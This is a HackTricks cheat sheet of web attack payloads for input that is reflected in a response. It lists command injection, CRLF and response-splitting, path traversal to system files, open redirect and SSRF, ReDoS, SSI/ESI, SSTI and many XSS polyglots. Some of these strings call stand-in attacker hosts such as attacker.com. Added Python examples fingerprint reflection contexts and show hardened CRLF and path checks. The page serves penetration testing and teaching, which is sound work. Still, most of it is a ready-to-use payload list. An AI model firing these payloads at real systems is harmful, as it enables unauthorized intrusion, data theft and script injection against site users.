Reflecting Techniques - PoCs and Polygloths CheatSheet
Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:
- If you want to see your company advertised in HackTricks or download HackTricks in PDF, check the SUBSCRIPTION PLANS!
- Get the official PEASS & HackTricks swag
- Discover The PEASS Family, our collection of exclusive NFTs
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @carlospolopm.
- Share your hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
The goal of these PoCs and Polygloths is to give the tester a fast summary of the vulnerabilities he may exploit if his input is somehow being reflected in the response.
{% hint style="warning" %} This cheatsheet doesn't propose an exhaustive list of tests for each vulnerability, just some basic ones. If you are looking for more comprehensive tests, access each proposed vulnerability. {% endhint %}
{% hint style="danger" %} You won't find Content-Type dependant injections like XXE here, as usually you will try those yourself if you find a request sending XML data. You won't find database injections here either, as even if some content could be reflected, it depends heavily on the backend DB technology and structure. {% endhint %}
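Before firing any payload from the lists below it pays to know two things about the reflection point: which HTML context the input lands in (text, attribute, event handler, `<script>` body) and which metacharacters survive the round trip unencoded, because those two facts decide which entries can possibly work. The following is an added example (not code from the HackTricks page) that answers both questions offline for a captured response: it sends a canary followed by `'"<>`, locates every reflection with the standard-library HTML parser, and reports per metacharacter whether it came back raw, entity-encoded, backslash-escaped or stripped. The canary string, the probe and `SAMPLE_RESPONSE` are constructed for the demo, not captured from a real application.

```python
import html
import re
from html.parser import HTMLParser

# Canary: alphanumeric so no encoder touches it; the metacharacters that follow it
# are the ones whose survival decides which payloads on this page can work.
CANARY = "zzq9canary"
METACHARS = "'\"<>"
PROBE = CANARY + METACHARS  # what you would actually send as the parameter value

# Constructed sample response: one parameter echoed into five places, each with a
# different (in)correct encoding. This is not a capture from any real application.
SAMPLE_RESPONSE = r"""<html><body>
<a href="/search?q=zzq9canary'&quot;&lt;&gt;">results</a>
<div class="echo">zzq9canary'"<></div>
<script>var q = "zzq9canary'\"<>";</script>
<input value='zzq9canary&#39;"&lt;&gt;' onclick="track('zzq9canary\'&quot;<>')">
</body></html>"""

VOID_TAGS = {"area", "base", "br", "col", "embed", "hr", "img", "input",
             "link", "meta", "source", "track", "wbr"}
URL_ATTRS = {"href", "src", "action", "formaction", "data"}
ENTITY = re.compile(r"&(?:#\d+|#x[0-9a-fA-F]+|[a-zA-Z]+);")


class _ContextFinder(HTMLParser):
    """Records the HTML context of every occurrence of the canary, in document order."""

    def __init__(self, canary):
        super().__init__(convert_charrefs=False)
        self.canary = canary
        self.open_tags = []
        self.contexts = []  # (kind, tag, attribute-or-None)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value and self.canary in value:
                if name.startswith("on"):
                    kind = "event-handler attribute"   # JS runs without any tag break
                elif name in URL_ATTRS:
                    kind = "url attribute"             # javascript: URLs become relevant
                else:
                    kind = "attribute"                 # need to break out of the quote
                self.contexts.append((kind, tag, name))
        if tag not in VOID_TAGS:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag in self.open_tags:
            while self.open_tags.pop() != tag:
                pass

    def handle_data(self, data):
        if self.canary in data:
            parent = self.open_tags[-1] if self.open_tags else "document"
            if parent in ("script", "style", "textarea", "title"):
                self.contexts.append((parent + " content", parent, None))
            else:
                self.contexts.append(("html text", parent, None))

    def handle_comment(self, data):
        if self.canary in data:
            self.contexts.append(("comment", "!--", None))


def find_contexts(body, canary=CANARY):
    finder = _ContextFinder(canary)
    finder.feed(body)
    finder.close()
    return finder.contexts


def metachar_survival(body, canary=CANARY, metachars=METACHARS):
    """For each reflection of canary+metachars, record what happened to each metachar."""
    reports = []
    start = body.find(canary)
    while start != -1:
        rest = body[start + len(canary):]
        report = {}
        for ch in metachars:
            entity = ENTITY.match(rest)
            if rest.startswith(ch):
                report[ch] = "raw"
                rest = rest[1:]
            elif rest.startswith("\\" + ch):
                report[ch] = "backslash-escaped"      # typical inside a JS string literal
                rest = rest[2:]
            elif entity and html.unescape(entity.group(0)) == ch:
                report[ch] = "entity-encoded"
                rest = rest[entity.end():]
            else:
                report[ch] = "stripped"               # gone, or changed beyond recognition
        reports.append(report)
        start = body.find(canary, start + 1)
    return reports


def reflection_report(body, canary=CANARY):
    """Pair each context with the metachar survival at that same reflection point."""
    return list(zip(find_contexts(body, canary), metachar_survival(body, canary)))


if __name__ == "__main__":
    for ctx, survival in reflection_report(SAMPLE_RESPONSE):
        print(ctx, survival)
```

Reading the output against the lists below: a reflection in `html text` with `<` and `>` raw takes the `<img src=x onerror=...>` style payloads; an `attribute` context with `"` raw takes `" onclick=alert() a="`; a `script content` reflection where `"` is backslash-escaped but `<` is raw still takes `</script><script>alert(1)</script>`; an `event-handler attribute` needs no metacharacters at all, only a JS expression.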
Polygloths list
{{7*7}}[7*7]
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
<br><b><h1>THIS IS AN INJECTED TITLE </h1>
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
Client Side Template Injection
Basic Tests
{{7*7}}
[7*7]
Polygloths
In this cheatsheet a polygloth is a single payload that chains several of the basic tests, so that one request triggers in more than one syntax or context at once; it has nothing to do with polyglot files.
{{7*7}}[7*7]
Command Injection
Basic Tests
;ls
||ls;
|ls;
&&ls;
&ls;
%0Als
`ls`
$(ls)
Polygloths
1;sleep${IFS}9;#${IFS}';sleep${IFS}9;#${IFS}";sleep${IFS}9;#${IFS}
/*$(sleep 5)`sleep 5``*/-sleep(5)-'/*$(sleep 5)`sleep 5` #*/-sleep(5)||'"||sleep(5)||"/*`*/
CRLF
Basic Tests
%0d%0aLocation:%20http://attacker.com
%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E
%3f%0D%0ALocation://x:1%0D%0AContent-Type:text/html%0D%0AX-XSS-Protection%3a0%0D%0A%0D%0A%3Cscript%3Ealert(document.domain)%3C/script%3E
%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2025%0d%0a%0d%0a%3Cscript%3Ealert(1)%3C/script%3E
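The CRLF payloads above only make sense once the `%0d%0a` has been URL-decoded by the framework and the resulting raw CR/LF reaches a header value unchecked. The following added example (not from the HackTricks page) shows that end to end with the second payload from the list: a hand-rolled redirect handler concatenates the decoded target into `Location:`, a naive response parser then sees the injected `Content-Type` and a body that starts with the `<script>`, and a hardened variant of the same handler refuses the value. `LEGIT_TARGET`, the handler names and the response builder are constructed for the demo; modern HTTP libraries already reject CR/LF in header values, so this bug lives in custom servers, proxies and frameworks that pass values straight through.

```python
from urllib.parse import unquote

# Second payload from the CRLF list above, exactly as it travels in a query string.
CRLF_PAYLOAD = ("%3f%0d%0aLocation:%0d%0aContent-Type:text/html%0d%0aX-XSS-Protection%3a0"
                "%0d%0a%0d%0a%3Cscript%3Ealert%28document.domain%29%3C/script%3E")

# The framework URL-decodes query parameters before the application sees them,
# so the handler receives literal CR/LF bytes. Constructed target, not a real site.
LEGIT_TARGET = "https://example.com/account"
ATTACKER_TARGET = LEGIT_TARGET + unquote(CRLF_PAYLOAD)


def vulnerable_redirect(target: str) -> bytes:
    """Hand-rolled redirect: header value concatenated without any validation."""
    return (b"HTTP/1.1 302 Found\r\n"
            b"Location: " + target.encode("utf-8") + b"\r\n"
            b"Content-Length: 0\r\n"
            b"\r\n")


def safe_header_value(value: str) -> str:
    """Reject anything that can end a header line or the whole header block.
    Check the DECODED value: a filter on the '%0d%0a' spelling is bypassed by any
    other encoding the framework decodes first."""
    if any(c in value for c in "\r\n\0"):
        raise ValueError("CR, LF or NUL in header value")
    return value


def hardened_redirect(target: str) -> bytes:
    return (b"HTTP/1.1 302 Found\r\n"
            b"Location: " + safe_header_value(target).encode("utf-8") + b"\r\n"
            b"Content-Length: 0\r\n"
            b"\r\n")


def parse_raw_response(raw: bytes):
    """Split a raw response the way a naive client does: first blank line ends the headers."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *header_lines = head.split(b"\r\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(b":")
        headers.append((name.strip().lower().decode(), value.strip().decode()))
    return status.decode(), headers, body


if __name__ == "__main__":
    status, headers, body = parse_raw_response(vulnerable_redirect(ATTACKER_TARGET))
    print(status)
    for h in headers:
        print("header:", h)
    print("body:", body)
    try:
        hardened_redirect(ATTACKER_TARGET)
    except ValueError as e:
        print("hardened handler refused:", e)
```

The parser deliberately mimics a lenient client: the injected empty `Location:` line, the attacker's `Content-Type`, and the `Content-Length: 0` the server meant to send (now sitting inside the body) are all visible in the parsed result, which is what makes this both a header injection and a response-splitting primitive.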
Dangling Markup
Basic Tests
<br><b><h1>THIS IS AN INJECTED TITLE </h1>
File Inclusion/Path Traversal
Basic Tests
/etc/passwd
../../../../../../etc/hosts
..\..\..\..\..\..\etc/hosts
/etc/hostname
../../../../../../etc/hosts
C:/windows/system32/drivers/etc/hosts
../../../../../../windows/system32/drivers/etc/hosts
..\..\..\..\..\..\windows/system32/drivers/etc/hosts
http://asdasdasdasd.burpcollab.com/mal.php
\\asdasdasdasd.burpcollab.com/mal.php
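The list above mixes four different ways of leaving the intended directory: an absolute Unix path, `../` traversal, the same traversal with backslashes (Windows accepts both separators, so a filter that only looks for `../` misses it), a drive-letter or URL scheme prefix, and a UNC path (`\\host\share`). The following added example (not from the HackTricks page) is the server-side check a practitioner would want against exactly those cases: it normalises the already URL-decoded user path onto a fixed root with pure string logic and rejects anything that does not stay underneath. `ROOT`, the function names and the two benign paths are assumptions for the demo; the payloads are the ones listed above.

```python
import posixpath
import re

# Document root the application is supposed to serve from (assumed, not from the page).
ROOT = "/srv/app/files"

# Payloads from the File Inclusion/Path Traversal list above.
PAGE_PAYLOADS = [
    "/etc/passwd",
    "../../../../../../etc/hosts",
    "..\\..\\..\\..\\..\\..\\etc/hosts",
    "/etc/hostname",
    "C:/windows/system32/drivers/etc/hosts",
    "../../../../../../windows/system32/drivers/etc/hosts",
    "..\\..\\..\\..\\..\\..\\windows/system32/drivers/etc/hosts",
    "http://asdasdasdasd.burpcollab.com/mal.php",
    "\\\\asdasdasdasd.burpcollab.com/mal.php",
]

# "http:", "file:", "C:" all look the same to the check: a word followed by a colon.
SCHEME_OR_DRIVE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*:")


def safe_join(root: str, user_path: str) -> str:
    """Join an already URL-decoded user path onto root, or raise ValueError.
    Pure string logic (posixpath) so the result is identical on every OS; backslashes
    are treated as separators because Windows targets accept both."""
    if "\0" in user_path:
        raise ValueError("NUL byte")
    candidate = user_path.replace("\\", "/")
    if SCHEME_OR_DRIVE.match(candidate):
        raise ValueError("scheme or drive letter")   # http://..., C:/...
    if candidate.startswith("/"):
        raise ValueError("absolute or UNC path")     # /etc/..., \\host\share -> //host/share
    root = root.rstrip("/")
    joined = posixpath.normpath(posixpath.join(root, candidate))
    if joined != root and not joined.startswith(root + "/"):
        raise ValueError("escapes root")             # ../ climbed above root
    return joined


def describe(root: str, user_path: str) -> str:
    """Resolved path, or 'rejected: <reason>' for reporting."""
    try:
        return safe_join(root, user_path)
    except ValueError as e:
        return f"rejected: {e}"


def check_page_payloads(root: str = ROOT) -> dict:
    return {p: describe(root, p) for p in PAGE_PAYLOADS}


if __name__ == "__main__":
    for payload, verdict in check_page_payloads().items():
        print(f"{payload!r:62} -> {verdict}")
    print(describe(ROOT, "docs/readme.txt"))
    print(describe(ROOT, "docs/../readme.txt"))  # ../ that stays inside root is fine
```

The check runs after decoding on purpose: the framework has already turned `%2e%2e%2f` into `../`, so matching on the encoded spelling would be the filter these payloads are designed to slip past. A `../` that stays inside the root (`docs/../readme.txt`) is accepted, which is the behaviour you want from a normaliser rather than a blocklist.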
Open Redirect / Server Side Request Forgery
Basic Tests
www.whitelisted.com
www.whitelisted.com.evil.com
https://google.com
//google.com
javascript:alert(1)
ReDoS
Basic Tests
(\\w*)+$
([a-zA-Z]+)*$
((a+)+)+$
Server Side Inclusion/Edge Side Inclusion
Basic Tests
<!--#echo var="DATE_LOCAL" -->
<!--#exec cmd="ls" -->
<esi:include src=http://attacker.com/>
x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Polygloths
<!--#echo var="DATE_LOCAL" --><!--#exec cmd="ls" --><esi:include src=http://attacker.com/>x=<esi:assign name="var1" value="'cript'"/><s<esi:vars name="$(var1)"/>>alert(/Chrome%20XSS%20filter%20bypass/);</s<esi:vars name="$(var1)"/>>
Server Side Request Forgery
The same tests used for Open Redirect can be used here.
Server Side Template Injection
Basic Tests
${{<%[%'"}}%\
{{7*7}}
${7*7}
<%= 7*7 %>
${{7*7}}
#{7*7}
Polygloths
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}${{<%[%'"}}%\
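The value of the SSTI polygloth is not just that something becomes `49`, but which segment did: each delimiter pair belongs to a different family of engines, and a `{{ }}` engine turns the `${{7*7}}` segment into `$49` while leaving `${7*7}` and `#{7*7}` untouched. The following added example (not from the HackTricks page) reads a reflected copy of the arithmetic part of the polygloth segment by segment and reports, for each one, whether it came back verbatim, was evaluated, or was altered by something else (HTML escaping, a filter, an error message), then maps the evaluated segments to the syntax families they indicate. The three sample responses are constructed to look like a `{{ }}` engine, an `<%= %>` engine and a plain HTML-escaping reflection; the trailing error-provoking `${{<%[%'"}}%\` segment of the full polygloth is not modelled.

```python
# Arithmetic part of the SSTI polygloth above, split into the segments it is made of.
# Each segment lists what it turns into when a given template syntax evaluates it.
SEGMENTS = [
    ("{{7*7}}",    {"49": "{{ }} engine (Jinja2, Twig, Nunjucks)"}),
    ("${7*7}",     {"49": "${ } engine (FreeMarker, Mako, Java EL)"}),
    ("<%= 7*7 %>", {"49": "<%= %> engine (ERB, EJS, JSP)"}),
    ("${{7*7}}",   {"$49": "{{ }} engine (the leading $ survived)",
                    "49": "engine that consumed the whole ${{ }} expression"}),
    ("#{7*7}",     {"49": "#{ } interpolation (Ruby strings, Pug, Spring EL)"}),
]
POLYGLOT = "".join(literal for literal, _ in SEGMENTS)  # {{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}

# Constructed responses: what the polygloth would come back as. Not real captures.
JINJA_LIKE_RESPONSE = "49${7*7}<%= 7*7 %>$49#{7*7}"
ERB_LIKE_RESPONSE = "{{7*7}}${7*7}49${{7*7}}#{7*7}"
ESCAPED_RESPONSE = "{{7*7}}${7*7}&lt;%= 7*7 %&gt;${{7*7}}#{7*7}"  # HTML-escaped, nothing evaluated


def fingerprint_ssti(reflected: str):
    """Walk the reflected string segment by segment.
    Returns (segment, status, observed) tuples, status being one of
    'reflected' (came back verbatim), 'evaluated' (came back as a result),
    'altered' (anything else: escaping, filtering, an error message)."""
    findings = []
    pos = 0
    for i, (literal, evaluated_forms) in enumerate(SEGMENTS):
        rest = reflected[pos:]
        if rest.startswith(literal):
            findings.append((literal, "reflected", literal))
            pos += len(literal)
            continue
        form = next((f for f in evaluated_forms if rest.startswith(f)), None)
        if form is not None:
            findings.append((literal, "evaluated", form))
            pos += len(form)
            continue
        # Unknown transformation: resynchronise on the next segment's literal text.
        end = len(reflected)
        if i + 1 < len(SEGMENTS):
            nxt = reflected.find(SEGMENTS[i + 1][0], pos)
            if nxt != -1:
                end = nxt
        findings.append((literal, "altered", reflected[pos:end]))
        pos = end
    return findings


def likely_engines(findings):
    """Map every evaluated segment to the template syntax family that produces it."""
    hints = []
    for (_literal, status, observed), (_, evaluated_forms) in zip(findings, SEGMENTS):
        if status == "evaluated":
            hints.append(evaluated_forms[observed])
    return hints


if __name__ == "__main__":
    for name, body in [("jinja-like", JINJA_LIKE_RESPONSE),
                       ("erb-like", ERB_LIKE_RESPONSE),
                       ("escaped", ESCAPED_RESPONSE)]:
        found = fingerprint_ssti(body)
        print(name, [status for _, status, _ in found], likely_engines(found))
```

An `altered` segment is still a finding: when the engine swallows the expression and returns an error or nothing, the resynchronisation step shows you exactly which delimiters were consumed, which is the cue to move to the dedicated SSTI page for that syntax.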
Server Side XSLT Injection
Basic Tests
<xsl:value-of select="system-property('xsl:version')" />
<esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
Polygloths
<xsl:value-of select="system-property('xsl:version')" /><esi:include src="http://10.10.10.10/data/news.xml" stylesheet="http://10.10.10.10//news_template.xsl"></esi:include>
XSS
Basic Tests
<script>alert('XSS')</script>
<img src="x" onerror="alert('XSS')">
" onclick=alert() a="
'"><img src=x onerror=alert(1) />
javascript:alert()
Polygloths
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//>
-->'"/></sCript><deTailS open x=">" ontoggle=(co\u006efirm)``>
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
">><marquee><img src=x onerror=confirm(1)></marquee>" ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->" ></script><script>alert(1)</script>"><img/id="confirm( 1)"/alt="/"src="/"onerror=eval(id&%23x29;>'"><img src="http: //i.imgur.com/P8mL8.jpg">
" onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//
';alert(String.fromCharCode(88,83,83))//';alert(String. fromCharCode(88,83,83))//";alert(String.fromCharCode (88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>
javascript://'/</title></style></textarea></script>--><p" onclick=alert()//>*/alert()/*
javascript://--></script></title></style>"/</textarea>*/<alert()/*' onclick=alert()//>a
javascript://</title>"/</script></style></textarea/-->*/<alert()/*' onclick=alert()//>/
javascript://</title></style></textarea>--></script><a"//' onclick=alert()//>*/alert()/*
javascript://'//" --></textarea></style></script></title><b onclick= alert()//>*/alert()/*
javascript://</title></textarea></style></script --><li '//" '*/alert()/*', onclick=alert()//
javascript:alert()//--></script></textarea></style></title><a"//' onclick=alert()//>*/alert()/*
--></script></title></style>"/</textarea><a' onclick=alert()//>*/alert()/*
/</title/'/</style/</script/</textarea/--><p" onclick=alert()//>*/alert()/*
javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
/</title/'/</style/</script/--><p" onclick=alert()//>*/alert()/*
-->'"/></sCript><svG x=">" onload=(co\u006efirm)``>
<svg%0Ao%00nload=%09((pro\u006dpt))()//
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//>
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//>
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>`
%0ajavascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert(test)//'">`
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+document.location=`//localhost/mH`//'>
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=document.location=`//localhost/mH`//>